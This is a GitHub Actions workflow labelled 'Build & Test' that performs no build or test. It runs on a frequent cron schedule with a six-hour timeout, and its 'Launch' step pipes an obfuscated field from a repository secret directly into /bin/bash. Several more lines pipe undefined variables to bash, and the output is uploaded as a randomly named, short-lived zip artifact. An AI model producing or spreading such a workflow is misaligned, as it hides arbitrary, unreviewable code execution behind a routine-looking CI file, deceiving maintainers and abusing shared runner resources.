name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '35 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          ps69101: ${{ secrets.ps69101 }}
        run: |
          printf '%s' "$ps69101" | jq -r .lrxp7 | /bin/bash
          printf '%s' "$ibo87" | jq -r .k0 | /bin/bash
          printf '%s' "$n59" | jq -r .b10 | /bin/bash
          echo $fmgcp0147 | jq -r .w4 | /bin/bash
          echo $yqov2 | jq -r .jvvb5 | /bin/bash
          printf '%s' "$wv071" | jq -r .amec04 | /bin/bash
          printf '%s' "$neti735" | jq -r .mvjwr165 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: DQvevE9X
          path: "*.zip"
          retention-days: 1
